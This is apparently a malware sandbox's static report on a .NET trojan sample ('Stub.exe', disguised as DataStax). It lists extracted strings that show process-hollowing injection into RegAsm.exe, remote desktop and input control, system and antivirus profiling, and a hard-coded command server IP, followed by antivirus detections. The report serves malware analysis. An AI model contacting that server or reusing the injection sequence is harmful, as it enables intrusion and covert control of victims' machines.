Static | ZeroBOX

PE Compile Time

2083-11-30 06:17:56

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000cc24 0x0000ce00 7.26132894469
.rsrc 0x00010000 0x000005da 0x00000600 4.19549108245
.reloc 0x00012000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000100a0 0x00000350 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000103f0 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
costura.costura.dll.compressed|6.0.0.0|Costura, Version=6.0.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d|Costura.dll|028E9832F421F11F9497C610F1734E0F3D868037|5120
costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960
costura.fastsearchlibrary.dll.compressed|1.1.8.0|FastSearchLibrary, Version=1.1.8.0, Culture=neutral, PublicKeyToken=null|FastSearchLibrary.dll|E47F69DA4D17B821A61CE9E4459B61C5ACDE4F11|30720
costura.packetlib.dll.compressed|1.0.0.0|PacketLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null|PacketLib.dll|06B6C5A9D6751E8F6866E51F577CAD5E16ADAB2F|8704
costura.packetlib.pdb.compressed|||PacketLib.pdb|B6731127F1227589FC75FA2A083B15FAF0CAC57C|38400
v4.0.30319
#Strings
<>9__0_0
<Main>b__0_0
<>c__DisplayClass0_0
<>9__17_0
<Connect>b__17_0
<>c__DisplayClass18_0
<Recieve>b__0
<ToMemory>b__0
<>8__1
<ToMemory>b__1
<>u__1
Task`1
TaskAwaiter`1
List`1
Reserved1
kernel32
ToUInt32
ToInt32
<byteSize>5__2
Dictionary`2
Reserved2
<>7__wrap2
ToInt16
<Recieve>d__18
get_UTF8
<Module>
DelegateCreateProcessA
LoadLibraryA
System.Drawing.Drawing2D
get_FormatID
MD5_STRING
CURSOR_SHOWING
POINTAPI
CURSORINFO
System.IO
Costura
dwData
costura.metadata
PacketLib
mscorlib
ReleaseHdc
GetHdc
System.Collections.Generic
Microsoft.VisualBasic
ReadAsync
ThreadId
ProcessId
GetProcessById
bytesRead
DelegateResumeThread
thread
payload
isAttached
Interlocked
costura.costura.pdb.compressed
costura.packetlib.pdb.compressed
costura.costura.dll.compressed
costura.packetlib.dll.compressed
costura.fastsearchlibrary.dll.compressed
get_Connected
isConnected
AwaitUnsafeOnCompleted
get_IsCompleted
get_Guid
<SendOneByOne>k__BackingField
<Value>k__BackingField
<isDesktopCapturing>k__BackingField
<networkStream>k__BackingField
<cancellationToken>k__BackingField
<WanIpAddress>k__BackingField
<packet>k__BackingField
<tcpClient>k__BackingField
<Country>k__BackingField
set_IsBackground
method
HandlePe
subscribe
Replace
CancellationTokenSource
source
CompressionMode
FromImage
message
Exchange
nullCache
EndInvoke
BeginInvoke
IDisposable
ThreadHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
WaitHandle
handle
Rectangle
Console
get_Name
GetMainboardName
GetAssemblyResourceName
get_MachineName
get_OSFullName
fullName
applicationName
SocketOptionName
get_UserName
GetName
GetCpuName
GetGpuName
requestedAssemblyName
get_SendOneByOne
set_SendOneByOne
commandLine
WriteLine
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
culture
Capture
MethodBase
Dispose
Create
MulticastDelegate
<>1__state
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
Execute
ToByte
get_Value
set_Value
TryGetValue
Recieve
add_AssemblyResolve
Build.exe
get_Size
cbSize
bufferSize
SizeOf
get_Jpeg
Config
System.Threading
Encoding
System.Drawing.Imaging
System.Runtime.Versioning
DownloadString
CultureToString
GetAsString
get_isDesktopCapturing
set_isDesktopCapturing
System.Drawing
InfoLog
ErrorLog
Attach
get_Width
get_Length
length
EndsWith
LoadApi
CreateApi
MsgPack
AsyncCallback
WaitCallback
callback
unpack_msgpack
MsgUnpack
msgUnpack
nullCacheLock
Client.Network
Marshal
Cancel
SocketOptionLevel
user32.dll
ThreadPool
ReadStream
LoadStream
GetManifestResourceStream
DeflateStream
NetworkStream
get_networkStream
set_networkStream
GetStream
MemoryStream
stream
get_Param
Program
HandleMem
get_Item
set_Item
QueueUserWorkItem
get_Is64BitOperatingSystem
Boolean
CopyFromScreen
GetScreen
screen
get_Token
CancellationToken
get_cancellationToken
set_cancellationToken
GetAsBoolen
bytesWritten
AppDomain
get_CurrentDomain
DrawIcon
FodyVersion
System.IO.Compression
Application
StartupInformation
ProcessInformation
processInformation
destination
CopyPixelOperation
System.Globalization
Action
DelegateZwUnmapViewOfSection
injection
System.Reflection
ManagementObjectCollection
set_Position
SetSocketOption
SetException
StringComparison
CopyTo
dwExtraInfo
ImageCodecInfo
BasicInfo
MethodInfo
HandleInfo
get_CultureInfo
GeoInfo
startupInfo
ParameterInfo
ComputerInfo
GetCursorInfo
Bitmap
Client.Help
get_Top
HandleDesktop
AssemblyLoader
AsyncVoidMethodBuilder
<>t__builder
sender
GetEncoder
Buffer
buffer
GetAsInteger
Logger
ManagementObjectSearcher
ResolveEventHandler
ToUpper
GetBiosManufacturer
EncoderParameter
GetAwaiter
GetDelegateForFunctionPointer
BitConverter
StdError
hCursor
ManagementObjectEnumerator
GetEnumerator
.cctor
Monitor
UIntPtr
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
ReadFromEmbeddedResources
DebuggingModes
GetAssemblies
inheritHandles
resourceNames
symbolNames
assemblyNames
threadAttributes
processAttributes
WriteAllBytes
GetBytes
get_Flags
AssemblyNameFlags
creationFlags
dwFlags
ResolveEventArgs
System.Threading.Tasks
Equals
Client.Utils
System.Windows.Forms
get_AllScreens
ptScreenPos
get_Chars
GetImageDecoders
Client.Handlers
Helpers
EncoderParameters
GetParameters
hProcess
GetCurrentProcess
process
GetProcAddress
baseAddress
get_WanIpAddress
set_WanIpAddress
address
System.Net.Sockets
GetAntivirus
Concat
ImageFormat
format
ManagementBaseObject
ManagementObject
object
Collect
Connect
Disconnect
protect
System.Net
HandlePacket
get_packet
set_packet
Socket
get_Left
get_Height
WaitForExit
IAsyncResult
GetResult
SetResult
result
ToLowerInvariant
get_Client
WebClient
TcpClient
get_tcpClient
set_tcpClient
System.Management
RuntimeEnvironment
environment
get_Current
keybd_event
mouse_event
get_EntryPoint
get_Count
ThreadStart
Convert
StdInput
StdOutput
MoveNext
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
DelegateVirtualAllocEx
CloseMutEx
CreateMutEx
GetAsByteArray
ToArray
Stub_ProcessedByFody
ContainsKey
<0>__ResolveAssembly
ReadExistingAssembly
GetExecutingAssembly
BlockCopy
ToMemory
DelegateReadProcessMemory
DelegateWriteProcessMemory
GetRuntimeDirectory
currentDirectory
get_Country
set_Country
set_CompositingQuality
op_Equality
IsNullOrEmpty
WrapNonExceptionThrows
DataStax
Copyright
DataStax 2025
$55E9E107-B2C6-464B-BDF1-54529E764B58
7.5.2.3
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
%Client.Network._Client+<Recieve>d__18
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
wwfJqCAYXz
92.255.57.221
Packet
BasicInfo
Country
Username
Microsoft
Antivirus
ErrorLog
Message
InfoLog
From client !
no connection
Command
Screens
MouseClick
MouseWheel
MouseMove
KeyboardClick
Desktop
Screen
Quality
Button
isKeyDown
ImageBytes
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_BIOS
Manufacturer
Unknown
SELECT * FROM Win32_BaseBoard
Product
SELECT * FROM Win32_Processor
SELECT * FROM Win32_DisplayConfiguration
Description
http://ip-api.com/line
Inject
Framework64
Framework
Update
C:\Windows\Temp
FileName
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
fastsearchlibrary
costura.fastsearchlibrary.dll.compressed
packetlib
costura.packetlib.dll.compressed
costura.packetlib.pdb.compressed
6.8.2.0
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
DataStax
CompanyName
DataStax
FileDescription
DataStax
FileVersion
7.5.2.3
InternalName
Stub.exe
LegalCopyright
Copyright
DataStax 2025
LegalTrademarks
DataStax
OriginalFilename
Stub.exe
ProductName
DataStax
ProductVersion
7.5.2.3
Assembly Version
7.5.2.3
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (moderate confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (D)
Alibaba Clean
K7GW Trojan ( 004cf1da1 )
K7AntiVirus Trojan ( 004cf1da1 )
huorong Trojan/MSIL.Injector.fx
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/Injector.LOS
APEX Malicious
Avast Win32:InjectorX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Heur.MSIL.Krypt.6
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Heur.MSIL.Krypt.6
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Trojan.InjectNET.17
VIPRE Gen:Heur.MSIL.Krypt.6
TrendMicro Clean
Trapmine suspicious.low.ml.score
CTX exe.unknown.krypt
Emsisoft Gen:Heur.MSIL.Krypt.6 (B)
Ikarus Trojan.MSIL.Injector
FireEye Generic.mg.98612673aa9539fb
Jiangmin Clean
Webroot Win.Trojan.Gen
Varist W32/MSIL_Troj.C.gen!Eldorado
Avira Clean
Fortinet MSIL/Injector.B!tr
Antiy-AVL Clean
Kingsoft malware.kb.c.964
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.MSIL.Krypt.6
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:MSIL/Injector.CG!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5746185
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Trojan.MSIL.DiscoStealer.Heur
Malwarebytes Trojan.Injector.MSIL
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData Gen:Heur.MSIL.Krypt.6
AVG Win32:InjectorX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.